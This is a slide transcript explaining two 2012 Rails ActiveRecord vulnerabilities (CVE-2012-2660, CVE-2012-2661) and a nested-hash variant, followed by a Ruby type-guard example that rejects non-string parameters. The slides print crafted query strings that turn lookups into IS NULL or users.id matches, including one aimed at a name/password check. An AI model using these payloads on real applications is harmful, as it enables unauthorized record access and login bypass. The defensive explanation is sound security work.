"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Transcript
Rails Vulnerabilities Last Week
CVE-2012-2660
CVE-2012-2661

CVE-2012-2660
Allows unexpected "IS NULL" in queries
Affects Rails 2.x and 3.x

ActiveRecord Query:
  unless params[:name].nil?
    @user = User.where(:name => params[:name])
  end

Query Parameters:
  ?name[]
  {"name"=>[nil]}

ActiveRecord Query (with the parsed parameter substituted; [nil] is not nil, so the guard passes):
  unless [nil].nil?
    @user = User.where(:name => [nil])
  end

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661
Allows some manipulation of WHERE clause via "dotted" query keys
Affects Rails 3.x

ActiveRecord Query:
  User.where(:name => params[:name])

ActiveRecord Query (the "table.column" key form that where also accepts):
  User.where("users.name" => params[:name])

Query Parameters:
  ?name[users.id]=1
  {"name"=>{"users.id"=>"1"}}

ActiveRecord Query (with the parsed parameter substituted):
  User.where(:name => {"users.id" => "1"})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1
Unreleased Vulnerability
Allows some manipulation of WHERE clause via nested hashes in query values
Affects 2.3.x and 3.x

ActiveRecord Query:
  User.where(:name => params[:name], :password => params[:password])

Query Parameters:
  ?name[users][id]=1&password[users][id]=1
  {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query (with the parsed parameters substituted):
  User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
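All three slides share one root cause: a parameter that the query treats as a scalar arrives from Rack as an Array or a Hash, and ActiveRecord's hash-condition syntax gives those structures their own meaning. A strict type guard that rejects non-String values before they reach `where`, as an added example that is not part of the original deck; `PARSED_PARAMS`, `scalar_param`, `name_condition` and `classify` are assumed names, and the parameter hashes are constructed to match what the slides show Rack producing rather than parsed from a live request.

```ruby
# Constructed parameter hashes, matching what the slides show Rack producing
# for each query string (constructed values, not a real parse).
PARSED_PARAMS = {
  "?"                  => {},                                           # param absent
  "?name=alice"        => { "name" => "alice" },                        # legitimate
  "?name[]"            => { "name" => [nil] },                          # CVE-2012-2660
  "?name[users.id]=1"  => { "name" => { "users.id" => "1" } },          # CVE-2012-2661
  "?name[users][id]=1" => { "name" => { "users" => { "id" => "1" } } }, # nested-hash case
}.freeze

class UnexpectedParamType < ArgumentError; end

# Return params[key] only when it is the scalar String a column comparison
# expects. Arrays and Hashes are exactly what become "IS NULL" or a different
# column on the slides, so they are rejected instead of being passed on.
def scalar_param(params, key)
  value = params[key]
  return nil if value.nil?
  unless value.is_a?(String)
    raise UnexpectedParamType, "#{key}: expected String, got #{value.class}"
  end
  value
end

# The condition hash the deck's query would hand to User.where, built only
# from a validated scalar; nil reproduces the original `unless ... nil?` skip.
def name_condition(params)
  name = scalar_param(params, "name")
  return nil if name.nil?
  { "name" => name }
end

# Classify one constructed request as accepted, skipped, or rejected.
def classify(query)
  cond = name_condition(PARSED_PARAMS.fetch(query))
  cond.nil? ? [:skipped, nil] : [:accepted, cond]
rescue UnexpectedParamType => e
  [:rejected, e.message]
end

if __FILE__ == $PROGRAM_NAME
  PARSED_PARAMS.each_key { |q| puts "#{q.ljust(22)} -> #{classify(q).inspect}" }
end
```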